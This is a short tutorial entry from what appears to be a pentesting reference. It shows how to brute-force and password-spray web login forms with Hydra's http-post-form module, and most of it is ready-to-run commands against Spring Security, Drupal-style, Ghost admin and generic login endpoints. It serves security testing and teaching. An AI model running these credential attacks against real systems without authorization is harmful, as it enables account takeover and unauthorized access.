← Back to search

Brute Force HTTP Login Forms with Hydra

exploitationtool

Summary

Brute force web login forms with Hydra's http-post-form module; the syntax is "path:POSTDATA:CONDITION" using F= for a failure string or S= for success.

Walkthrough

Hydra's http-post-form module brute forces web login forms by replaying POST requests and matching a success or failure marker in the response.

Steps

  1. The module format is "path:POSTDATA:CONDITION" where ^USER^/^PASS^ are substituted from the wordlists.
  2. Use F=<string> to flag a failed login (any response containing the string is a miss) or S=<string> for a success marker when failures are hard to isolate.
  3. Set the port with -s when the app runs off port 80/443; use https-post-form for TLS.
  4. Spray a single password across many usernames with -L names.txt -p '<PASS>', or supply combos with -C userpass.
  5. JSON-based logins (e.g. Ghost admin API) work too — just put the JSON body in the POSTDATA field and escape the quotes. Match a substring rather than a string containing a literal :, which breaks parsing.

Commands

bash

hydra -l info -P /usr/share/wordlists/rockyou.txt <TARGET> http-post-form "/login:username=^USER^&password=^PASS^:F=error"

bash

hydra -l jennifer -P /usr/share/wordlists/rockyou.txt <TARGET> -s 8080 http-post-form "/j_spring_security_check:j_username=^USER^&j_password=^PASS^&from=&Submit=:F=loginError"

bash

hydra -l jennifer -P /usr/share/wordlists/rockyou.txt <TARGET> -s 8080 http-post-form "/j_spring_security_check:j_username=^USER^&j_password=^PASS^&from=&Submit=:S=Location"

bash

hydra -L /usr/share/wordlists/seclists/Usernames/Names/names.txt -p <PASS> <TARGET> http-post-form "/?q=user/login:name=^USER^&pass=^PASS^&form_build_id=form-xyz&form_id=user_login&op=Log+in:F=Sorry, incorrect password"

bash

hydra -l admin@<TARGET> -P /usr/share/wordlists/rockyou.txt <TARGET> http-post-form "/ghost/api/admin/session:{\"username\":\"^USER^\",\"password\":\"^PASS^\"}:F=Invalid"

bash

hydra -C userpass <TARGET> https-post-form "/login.php:username=^USER^&password=^PASS^:F=failed"